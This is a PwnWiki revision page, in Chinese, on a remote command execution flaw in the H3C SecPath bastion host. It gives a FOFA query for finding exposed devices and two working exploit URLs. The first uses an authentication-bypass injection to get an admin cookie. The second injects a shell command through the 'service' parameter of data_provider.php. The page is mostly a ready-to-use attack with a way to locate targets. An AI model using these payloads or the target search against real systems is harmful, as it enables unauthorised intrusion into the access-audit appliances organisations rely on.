Difference between revisions of "H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞"
From PwnWiki
(Created page with "<languages /> {| style="margin: auto; width: 750px;color:green;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing=...") |
(Marked this version for translation) |
||
| Line 12: | Line 12: | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
H3C SecParh fortress machine | H3C SecParh fortress machine | ||
| Line 22: | Line 22: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
通過任意用戶登錄獲取Cookie: | 通過任意用戶登錄獲取Cookie: | ||
</translate> | </translate> | ||
| Line 36: | Line 37: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:4--> |
</translate> | </translate> | ||
https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw | https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw | ||
Latest revision as of 10:05, 21 June 2021
|
漏洞影響
H3C SecParh fortress machine
FOFA
app="H3C-SecPath-运维审计系统"
漏洞利用
通過任意用戶登錄獲取Cookie:
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
